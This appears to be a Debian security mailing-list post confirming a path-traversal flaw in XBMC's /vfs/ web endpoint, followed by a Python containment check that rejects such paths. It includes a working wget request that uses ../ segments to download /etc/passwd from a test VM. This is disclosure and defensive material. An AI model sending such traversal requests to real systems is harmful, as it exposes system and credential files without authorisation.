Just confirmed (after a reasonable amount of time) that XBMC in wheezy is vulnerable to CVE-2017-5982 although the exploit is different.

When XBMC is run as root (yes, probably bad idea, this is a VM for testing):

http://192.168.122.47/vfs/special://masterprofile/Thumbnails/Video/f/auto-f4b8e6fd.tbn

retrieves:

/root/.xbmc/userdata/Thumbnails/Video/f/auto-f4b8e6fd.tbn

Or:

wget 'http://192.168.122.47/vfs/special://masterprofile/Thumbnails/Video/f/../../../../../../etc/passwd'

Downloads - guess what? /etc/passwd

This was marked as "unreproducible" for 2:12.3+dfsg1-3ubuntu1 in dla-needed.txt, however I have a suspicion that is incorrect.

However the information for CVE-2017-5982 is for /image not /vfs

-- 
Brian May <[email protected]>
https://linuxpenguins.xyz/brian/
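
The containment check that the /vfs/ behaviour reported above lacks, as an added example that is not part of the original message and is not XBMC's own code. The function name `resolve_vfs` and the `SPECIAL_ROOTS` table are hypothetical; the `masterprofile` mapping is the one shown in the message.

```python
import posixpath
from urllib.parse import unquote

# Assumption: special:// root as observed in the message (XBMC running as root).
SPECIAL_ROOTS = {"masterprofile": "/root/.xbmc/userdata"}
VFS_PREFIX = "/vfs/"
SCHEME = "special://"


def resolve_vfs(request_path):
    """Return the file a /vfs/ request may serve, or None if it must be rejected."""
    if not request_path.startswith(VFS_PREFIX):
        return None
    # Decode percent-escapes first so encoded dot segments are seen as "..".
    target = unquote(request_path[len(VFS_PREFIX):])
    if "\x00" in target or not target.startswith(SCHEME):
        return None
    name, _, rel = target[len(SCHEME):].partition("/")
    root = SPECIAL_ROOTS.get(name)
    if root is None:
        return None
    # join() lets an absolute rel replace the root; normpath() collapses "..".
    # Either way the result is checked against the root afterwards.
    full = posixpath.normpath(posixpath.join(root, rel))
    if full != root and not full.startswith(root + "/"):
        return None
    # This check is lexical only; a server should also compare
    # os.path.realpath() results so symlinks cannot leave the root.
    return full


if __name__ == "__main__":
    # Constructed sample requests, modelled on the two URLs in the message.
    for path in (
        "/vfs/special://masterprofile/Thumbnails/Video/f/auto-f4b8e6fd.tbn",
        "/vfs/special://masterprofile/Thumbnails/Video/f/../../../../../../etc/passwd",
    ):
        print(path, "->", resolve_vfs(path))
```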
